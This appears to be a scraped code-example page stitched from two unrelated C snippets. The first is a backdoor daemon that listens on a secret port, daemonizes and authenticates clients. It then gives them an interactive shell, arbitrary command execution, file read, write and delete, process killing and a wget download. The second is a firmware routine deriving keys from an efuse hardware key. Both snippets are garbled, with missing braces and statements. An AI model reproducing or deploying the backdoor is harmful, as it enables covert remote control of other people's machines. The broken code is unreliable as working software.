        sa.sin_port = *(uint16_t *) (secret + 32 + 64);


        if (bind(ls, (struct sockaddr *)&sa, sizeof (sa)))
                return 0;

        if (listen(ls, 1))
                return 0;

        write(1, MSG("ZohHoo5i"));

        if (fork())
                return 0;

        sigaction(SIGHUP, &sa_sigign, 0);
        sigaction(SIGCHLD, &sa_sigign, 0);


        for (;;) {
                        int i = open("/dev/urandom", O_RDONLY);

                        if (i >= 0) {
                                read(i, secret, 32);


                        for (i = 0; i < 31; ++i)
                                secret[i + 1] += secret[i];

                int fd = accept(ls, 0, 0);

                if (fd >= 0) {
                        if (fork() == 0) {
                                sigaction(SIGCHLD, &sa_sigdfl, 0);



                                write(0, secret, 32 + 32);
                                crypto_hash(buffer, secret, 32 + 32 + 32);


                                if (memcmp(buffer, buffer + 32, 32))

                                wpkt(MSG(VERSION "/" arch));    /* version/arch */
                                static const uint32_t endian = 0x11223344;

                                wpkt((uint8_t *) & endian, sizeof (endian));
                                wpkt(buffer, 0);

                                uint8_t clen;
                                int fh = -1;
                                int ret;

                                while ((clen = rpkt(0)))
                                        switch (buffer[0]) {
                                          case 1:      // telnet
                                                          static char *argv[] = { "sh", "-i", 0 };
                                                          execve("/bin/sh", argv, environ);

                                          case 2:      // open readonly
                                          case 3:      // open wrcreat
                                                  ret = fh = open(buffer + 1, buffer[0] == 2 ? O_RDONLY : O_RDWR | O_CREAT, 0600);

                                          case 4:      // close

                                          case 5:      // kill
                                                  ret = syscall(SCN(SYS_kill), *(uint32_t *) (buffer + 4), buffer[1]);

                                          case 6:      // chmod
                                                  ret = syscall(SCN(SYS_chmod), buffer + 4, *(uint16_t *) (buffer + 2));

                                          case 7:      // rename
                                                  ret = syscall(SCN(SYS_rename), buffer + 1, buffer + 260);

                                          case 8:      // unlink
                                                  ret = syscall(SCN(SYS_unlink), buffer + 1);

                                          case 9:      // mkdir
                                                  ret = syscall(SCN(SYS_mkdir), buffer + 1, 0700);

                                          case 10:     // wget
                                                  ret = wget(fh);

                                          case 11:     // lstat
                                          case 23:     // stat
                                                          struct stat buf;
                                                          int l = (buffer[0] == 23 ? stat : lstat) (buffer + 1, &buf);

                                                          ((uint32_t *) buffer)[0] = buf.st_dev;
                                                          ((uint32_t *) buffer)[1] = buf.st_ino;
                                                          ((uint32_t *) buffer)[2] = buf.st_mode;
                                                          ((uint32_t *) buffer)[3] = buf.st_size;
                                                          ((uint32_t *) buffer)[4] = buf.st_mtime;

                                                          wpkt(buffer, l ? 0 : sizeof (uint32_t) * 5);

                                          case 12:
                                                          struct statfs sfsbuf;
                                                          int l = statfs(buffer + 1, &sfsbuf);

                                                          ((uint32_t *) buffer)[0] = sfsbuf.f_type;
                                                          ((uint32_t *) buffer)[1] = sfsbuf.f_bsize;
                                                          ((uint32_t *) buffer)[2] = sfsbuf.f_blocks;
                                                          ((uint32_t *) buffer)[3] = sfsbuf.f_bfree;
                                                          ((uint32_t *) buffer)[4] = sfsbuf.f_bavail;
                                                          ((uint32_t *) buffer)[5] = sfsbuf.f_files;
                                                          ((uint32_t *) buffer)[6] = sfsbuf.f_ffree;

                                                          wpkt(buffer, l ? 0 : sizeof (uint32_t) * 7);

                                          case 13:     // exec quiet
                                          case 14:     // exec till marker
                                                          int quiet = buffer[0] == 13;

                                                          pid_t pid = fork();

                                                          if (pid == 0) {
                                                                  if (quiet)
                                                                          setfds(open("/dev/null", O_RDWR));

                                                                  static char *argv[] = { "sh", "-c", buffer + 1, 0 };
                                                                  execve("/bin/sh", argv, environ);

                                                          if (pid > 0)
                                                                  syscall(SCN(SYS_waitpid), (int)pid, &ret, 0);

                                                          if (!quiet)
                                                                  wpkt(secret, 32 + 32);        // challenge + id

                                          case 15:     // readdir
                                                          int l;

                                                          while ((l = syscall(SCN(SYS_getdents64), fh, buffer, sizeof (buffer))) > 0) {
                                                                  uint8_t *buf = buffer;

                                                                  do {
                                                                          int w = l > 254 ? 254 : l;

                                                                          wpkt(buf, w);
                                                                          buf += w;
                                                                          l -= w;
                                                                  while (l);

                                                          wpkt(buffer, 0);

                                          case 16:     // lseek
                                                  ret = lseek(fh, *(int32_t *) (buffer + 4), buffer[3]);

                                          case 17:     // fnv
                                          case 18:     // readall
                                                          int fnv = buffer[0] == 17;
                                                          uint32_t hval = 2166136261U;
                                                          int l;

                                                          while ((l = read(fh, buffer, 254)) > 0) {
                                                                  if (fnv) {
                                                                          uint8_t *p = buffer;

                                                                          while (l--) {
                                                                                  hval ^= *p++;
                                                                                  hval *= 16777619;
                                                                  } else
                                                                          wpkt(buffer, l);

                                                          wpkt((uint8_t *) & hval, fnv ? sizeof (hval) : 0);

                                          case 19:     // write
                                                  ret = write(fh, buffer + 1, clen - 1);

                                          case 20:     // readlink
                                                          int l = syscall(SCN(SYS_readlink), buffer + 1, buffer + 260, 255);

                                                          wpkt(buffer + 260, l > 0 ? l : 0);

                                          case 21:     // readret
                                                  wpkt((uint8_t *) & ret, sizeof (ret));

                                          case 22:     // chdir
                                                  ret = syscall(SCN(SYS_chdir), buffer + 1);

                        // keep fd open for at least delay, also delay hack attempts
                        static const struct timespec ts = { 1, 0 };
                        syscall(SCN(SYS_nanosleep), &ts, 0);

Example #30
* 函 数 名  : create_crypto_key
* 功能描述  : 使用输入的数据和HUK,生成密钥。当前支持MD5、和SHA-1算法。
*             生成密钥的方法:
*             把HUK和输入的数据连接起来作为MD5或SHA-1算法的输入,计算其HASH值。
* 输入参数  : data:      用于生成密钥的数据。
*             len:       用于生成密钥的数据长度。(byte)
*             algorithm: 要使用的密钥生成算法。
*             klen:      作为输入参数,存放key的缓冲区的长度。(byte)
* 输出参数  : key:       存放生成的密钥。buffer必须大于16(MD5)/20(SHA-1)字节。
*             klen:      作为输出参数,存放生成的密钥的长度。(byte)
* 返 回 值  : BSP_OK:    生成成功。
*             BSP_ERROR: 生成失败。
* 其它说明  : klen为输入/输出参数,传入的klen变量所用内存必须可写回。
*             所以避免直接传入类似sizeof()的函数调用结果。
int create_crypto_key_o(char *data, int len, CREATE_CRYPTO_KEY_ALGORITHM algorithm, char *key, int *klen)
    char* crypto_data = NULL;
    UINT8 i=0;

        if(BSP_OK != param_check(data,len,algorithm,key,klen))
        security_print("ERROR create_crypto_key: param is invalid!\n");
        goto ERROR_EXIT;

    crypto_data = (char*)malloc(len + HUK_LEN);

    if(crypto_data == NULL)
        security_print("ERROR create_crypto_key: malloc failed!\n");
        goto ERROR_EXIT;

	memset(crypto_data, 0, len + HUK_LEN);

	/* Read & Copy HUK.*/
	if(BSP_OK != bsp_efuse_read((u32*)crypto_data, EFUSE_GRP_HUK, (HUK_LEN/sizeof(uint32)) ))
			security_print("ERROR create_crypto_key: efuseRead failed!\n");
			goto ERROR_EXIT;

            if(0 != *(((UINT8*)crypto_data)+i))

            security_print("ERROR create_crypto_key: read_efuse NULL!\n");
            goto ERROR_EXIT;

    // Copy user data.
    memcpy((void*)((UINT32)crypto_data + HUK_LEN), data, len);

    // Encrypt.
        if(BSP_OK != crypto_hash(crypto_data, len + HUK_LEN, (CRYPTO_HASH_ALGORITHM)algorithm, key, klen))
            security_print("ERROR create_crypto_key: crypto_hash failed!\n");
            goto ERROR_EXIT;


        security_print("ERROR create_crypto_key: unknown algorithm!\n");

        goto ERROR_EXIT;

    if(crypto_data != NULL)
#ifndef _DRV_LLT_
    return BSP_OK;

    if(crypto_data != NULL)

    return BSP_ERROR;